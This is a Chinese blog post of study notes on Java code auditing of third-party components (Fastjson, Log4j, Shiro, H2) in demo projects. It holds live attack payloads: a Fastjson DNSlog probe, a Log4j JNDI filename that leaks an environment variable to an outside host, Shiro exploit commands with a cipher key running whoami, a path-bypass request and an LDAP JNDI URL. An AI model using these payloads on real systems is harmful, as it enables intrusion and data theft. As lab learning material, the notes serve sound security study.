DAY120java审计第三方组件&依赖库挖掘&Fastjson&Shiro&Log4j&H2DB

于 2024-11-16 16:48:54 发布
阅读量1k 收藏 8
点赞数 21
分类专栏: 小迪笔记 #java代码审计 文章标签: 安全 java 开发语言 代码审计 log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74402888/article/details/143819479
版权

组件漏洞判断插件

一、Tmall_demo-master(fastjson

1、配置文件查找安装组件

1、JSON.parse(json)

2、JSON.parseObject

2、找可控的变量

3、利用组件漏洞

poc:propertyJson={"@type":"java.net.Inet4Address","val":"233997ee.log.dnslog.sbs"}

二、Tmall_demo-master(Log4j)

logger.error,logger.info函数触发

1、配置文件查找安装组件

session不可控

2、寻找可控变量

originalFileName从file.getOriginalFilename获取文件名

修改文件名利用漏洞

Poc:filename="${jndi:ldap://${env:OS}.7ffb7b28.log.dnslog.sbs}"

3、Jndi

失败

版本不在区间

三、RuoYi-v4.2(shrio版本漏洞)

/docs;/../admin/

1、密钥setCipherKey

python shiro-exploit.py check -u http://127.0.0.1

2、利用链

python shiro-exploit.py echo -g CommonsCollectionsK1 -u http://127.0.0.1 -v 2 -k fCq+/xW488hMTCD+cmJ3aQ== -c whoami

3、shiro漏洞绕过拦截器

4、/css;/../common/download利用漏洞shiro

GET /css;/../common/download HTTP/1.1

四、halo-0.4.3(h2database)

1、环境配置进入后台

2、访问h2database

javax.naming.InitialContext

ldap://192.168.93.1:1389/9nbcm6

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值